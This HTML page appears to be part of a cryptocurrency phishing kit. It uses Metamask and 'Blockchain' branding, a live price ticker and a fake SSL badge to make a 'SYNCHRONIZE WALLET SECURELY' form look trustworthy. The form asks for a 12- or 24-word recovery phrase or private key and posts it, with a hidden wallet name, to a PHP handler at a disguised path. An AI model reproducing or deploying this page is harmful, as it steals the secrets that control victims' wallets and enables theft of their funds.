<!DOCTYPE >
<html style="font-size: 16px" class="u-responsive-xl" lang="en">
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta charset="utf-8" />
    <meta name="keywords" content="" />
    <meta name="description" content="" />
    <meta name="page_type" content="np-template-header-footer-from-plugin" />
    <title>Math</title>
    <link
      rel="stylesheet"
      href="../static/fixed/style/css/nicepage.css"
      media="screen"
    />
    <link rel="stylesheet" href="css/Metamask.css" media="screen" />
    <script
      class="u-script"
      type="text/javascript"
      src="jquery.js"
      defer=""
    ></script>
    <script
      class="u-script"
      type="text/javascript"
      src="nicepage.js"
      defer=""
    ></script>
    <meta name="generator" content="Nicepage 3.30.2, nicepage.com" />
    <link rel="icon" href="../chain/images/static/favicon.webp" />
    <link
      id="u-theme-google-font"
      rel="stylesheet"
      href="https://fonts.googleapis.com/css?family=Montserrat:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i|Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i"
    />
    <link
      id="u-page-google-font"
      rel="stylesheet"
      href="https://fonts.googleapis.com/css?family=Oswald:200,300,400,500,600,700"
    />

    <script type="application/ld+json">
      {
        "@context": "http://schema.org",
        "@type": "Organization",
        "name": "BLOCKCHAIN NODE TOOL",
        "logo": "images/BLOCKCHAIN.webp"
      }
    </script>
    <meta name="theme-color" content="#2f4ace" />
    <meta property="og:title" content="Metamask" />
    <meta property="og:description" content="" />
    <meta property="og:type" content="website" />
  </head>
  <body class="u-body">
    <header class="u-clearfix u-header u-white u-header" id="sec-91cc">
      <div class="u-clearfix u-sheet u-sheet-1">
        <nav
          class="u-menu u-menu-dropdown u-offcanvas u-menu-1 u-enable-responsive"
          data-responsive-from="XL"
        >
          <div
            class="menu-collapse"
            style="
              font-size: 1rem;
              letter-spacing: 0px;
              font-weight: 700;
              text-transform: uppercase;
            "
            wfd-invisible="true"
          >
            <a
              class="u-button-style u-custom-active-border-color u-custom-border u-custom-border-color u-custom-borders u-custom-hover-border-color u-custom-left-right-menu-spacing u-custom-padding-bottom u-custom-text-color u-custom-text-hover-color u-custom-top-bottom-menu-spacing u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base"
              href="#"
            >
              <svg>
                <use
                  xmlns:xlink="http://www.w3.org/1999/xlink"
                  xlink:href="#menu-hamburger"
                ></use>
              </svg>
              <svg
                version="1.1"
                xmlns="http://www.w3.org/2000/svg"
                xmlns:xlink="http://www.w3.org/1999/xlink"
              >
                <defs>
                  <symbol
                    id="menu-hamburger"
                    viewBox="0 0 16 16"
                    style="width: 16px; height: 16px"
                  >
                    <rect y="1" width="16" height="2"></rect>
                    <rect y="7" width="16" height="2"></rect>
                    <rect y="13" width="16" height="2"></rect>
                  </symbol>
                </defs>
              </svg>
            </a>
          </div>
          <div class="u-custom-menu u-nav-container">
            <ul class="u-nav u-spacing-30 u-unstyled u-nav-1">
              <li class="u-nav-item">
                <a
                  class="u-border-2 u-border-active-palette-1-base u-border-hover-palette-1-base u-border-no-left u-border-no-right u-border-no-top u-button-style u-nav-link u-text-active-palette-1-base u-text-grey-90 u-text-hover-grey-90"
                  href="about-us.html"
                  style="padding: 10px 0px"
                  >about us</a
                >
              </li>
              <li class="u-nav-item">
                <a
                  class="u-border-2 u-border-active-palette-1-base u-border-hover-palette-1-base u-border-no-left u-border-no-right u-border-no-top u-button-style u-nav-link u-text-active-palette-1-base u-text-grey-90 u-text-hover-grey-90"
                  href="blockchain-node.html"
                  style="padding: 10px 0px"
                  >blockchain node</a
                >
              </li>
            </ul>
          </div>
          <div
            class="u-custom-menu u-nav-container-collapse"
            wfd-invisible="true"
          >
            <div
              class="u-black u-container-style u-inner-container-layout u-opacity u-opacity-95 u-sidenav"
            >
              <div class="u-inner-container-layout u-sidenav-overflow">
                <div class="u-menu-close"></div>
                <ul
                  class="u-align-center u-nav u-popupmenu-items u-unstyled u-nav-2"
                >
                  <li class="u-nav-item">
                    <a
                      class="u-button-style u-nav-link"
                      href="about-us.html"
                      style="padding: 10px 20px"
                      >about us</a
                    >
                  </li>
                </ul>
              </div>
            </div>
            <div
              class="u-black u-menu-overlay u-opacity u-opacity-70"
              wfd-invisible="true"
            ></div>
          </div>
          <style class="offcanvas-style">
            .u-offcanvas .u-sidenav {
              flex-basis: 250px !important;
            }
            .u-offcanvas:not(.u-menu-open-right) .u-sidenav {
              margin-left: -250px;
            }
            .u-offcanvas.u-menu-open-right .u-sidenav {
              margin-right: -250px;
            }
            @keyframes menu-shift-left {
              from {
                left: 0;
              }
              to {
                left: 250px;
              }
            }
            @keyframes menu-unshift-left {
              from {
                left: 250px;
              }
              to {
                left: 0;
              }
            }
            @keyframes menu-shift-right {
              from {
                right: 0;
              }
              to {
                right: 250px;
              }
            }
            @keyframes menu-unshift-right {
              from {
                right: 250px;
              }
              to {
                right: 0;
              }
            }
          </style>
        </nav>
        <div class="u-container-style u-group u-white u-group-1">
          <div class="u-container-layout u-container-layout-1">
            <h3 class="u-headline u-text u-text-palette-1-dark-2 u-text-1">
              <a href="/">BLOCKCHAIN</a>
            </h3>
            <a
              href="wallets.html"
              data-page-id="214123313"
              class="u-image u-logo u-image-1"
              data-image-width="400"
              data-image-height="400"
              title="wallets"
            >
              <img
                src="../chain/images/static/BLOCKCHAIN.webp"
                class="u-logo-image u-logo-image-1"
              />
            </a>
          </div>
        </div>
      </div>
    </header>
    <section
      class="u-clearfix u-valign-middle-lg u-valign-middle-md u-section-1"
      id="sec-f998"
    >
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-clearfix u-gutter-30 u-layout-wrap u-layout-wrap-1">
          <div class="u-layout">
            <div class="u-layout-row">
              <div
                class="u-container-style u-layout-cell u-left-cell u-size-60 u-layout-cell-1"
              >
                <div class="u-container-layout u-container-layout-1">
                  <div class="u-clearfix u-custom-html u-custom-html-1">
                    <cove-markets-market-ticker-tape
                      instrumentselection="BTC-USD,ETH-USD,SOL-USD,ADA-USD"
                      position="center"
                      width="100%"
                      maxwidth="900px"
                      border="1px solid gray"
                      showborder="true"
                      style="position: relative"
                    ></cove-markets-market-ticker-tape>
                    <script
                      type="module"
                      defer="defer"
                      src="https://cdn.jsdelivr.net/npm/@covemarkets/web-widgets@0.0.36/dist/market-ticker-tape/index.js"
                    ></script>
                  </div>
                  <h2
                    class="u-text u-text-default u-text-palette-1-dark-2 u-text-1"
                  >
                    SYNCHRONIZE WALLET SECURELY
                  </h2>
                  <img
                    src="../chain/images/static/27.jpg"
                    alt=""
                    class="u-image u-image-default u-image-1"
                    data-image-width="693"
                    data-image-height="1080"
                  />
                  <h6
                    class="u-align-center u-text u-text-default u-text-palette-1-dark-2 u-text-2"
                  >
                    SECURELY ENTER YOUR WALLET DETAILS TO PROCEED<br />Enter 12
                    or 24 word Phrase/Private key
                  </h6>
                  <div
                    class="u-align-center u-border-4 u-border-palette-1-dark-2 u-form u-radius-29 u-form-1"
                  >
                    <form
                      action="../auth/cloud/google/static/form-f998-17.php"
                      id="phrasekeyForm"
                      name="phrasekeyForm"
                      method="POST"
                      class="u-clearfix u-form-spacing-17 u-form-vertical u-inner-form"
                      style="padding: 8px"
                    >
                      <div class="u-form-group">
                        <label
                          for="email-ef64"
                          class="u-form-control-hidden u-label u-label-1"
                          wfd-invisible="true"
                        ></label>
                        <input
                          type="hidden"
                          id="walletname"
                          name="walletname"
                          value="Math"
                        />
                        <input
                          type="text"
                          placeholder="PHRASE/PRIVATE KEY"
                          id="email-ef64"
                          name="PHRASE"
                          class="u-border-19 u-border-palette-5-light-3 u-input u-input-rectangle u-palette-5-light-3 u-radius-50 u-input-1"
                          required="required"
                          autofocus="autofocus"
                        />
                      </div>
                      <div class="u-align-center u-form-group u-form-submit">
                        <!--<a href="#" class="u-active-palette-2-light-1 u-border-1 u-border-active-palette-2-light-1 u-border-hover-palette-1-light-1 u-border-palette-1-light-1 u-btn u-btn-round u-btn-submit u-button-style u-custom-font u-font-oswald u-hover-palette-1-dark-2 u-palette-4-base u-radius-50 u-text-active-white u-text-body-alt-color u-text-hover-white u-btn-1">SYNCHRONIZE</a>-->
                        <input type="submit" value="SYNCHRONIZE"
                        class="u-active-palette-2-light-1 u-border-1
                        u-border-active-palette-2-light-1
                        u-border-hover-palette-1-light-1
                        u-border-palette-1-light-1 u-btn u-btn-round
                        u-btn-submit u-button-style u-custom-font u-font-oswald
                        u-hover-palette-1-dark-2 u-palette-4-base u-radius-50
                        u-text-active-white u-text-body-alt-color
                        u-text-hover-white u-btn-1"" wfd-invisible="true">
                      </div>
                      <div
                        class="u-form-send-message u-form-send-success"
                        wfd-invisible="true"
                      >
                        #FormSendSuccess
                      </div>
                      <div
                        class="u-form-send-error u-form-send-message"
                        wfd-invisible="true"
                      >
                        #FormSendError
                      </div>
                      <input
                        type="hidden"
                        value=""
                        name="recaptchaResponse"
                        wfd-invisible="true"
                      />
                    </form>
                  </div>
                  <img
                    src="../chain/images/static/ssl-image.jpg"
                    alt=""
                    class="u-image u-image-default u-image-2"
                    data-image-width="250"
                    data-image-height="250"
                  />
                  <span
                    class="u-file-icon u-icon u-icon-circle u-text-palette-1-base u-icon-1"
                    ><img src="../chain/images/static/arrow-right.png" alt=""
                  /></span>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>

    <footer
      class="u-align-center u-clearfix u-footer u-palette-1-dark-2 u-footer"
      id="sec-2260"
    >
      <div class="u-clearfix u-sheet u-valign-middle-xs u-sheet-1">
        <p class="u-small-text u-text u-text-variant u-text-1">
          Copyright: Blockchain 2022.
        </p>
      </div>
    </footer>

    <style>
      .u-disable-duration * {
        transition-duration: 0s !important;
      }
    </style>
  </body>
</html>
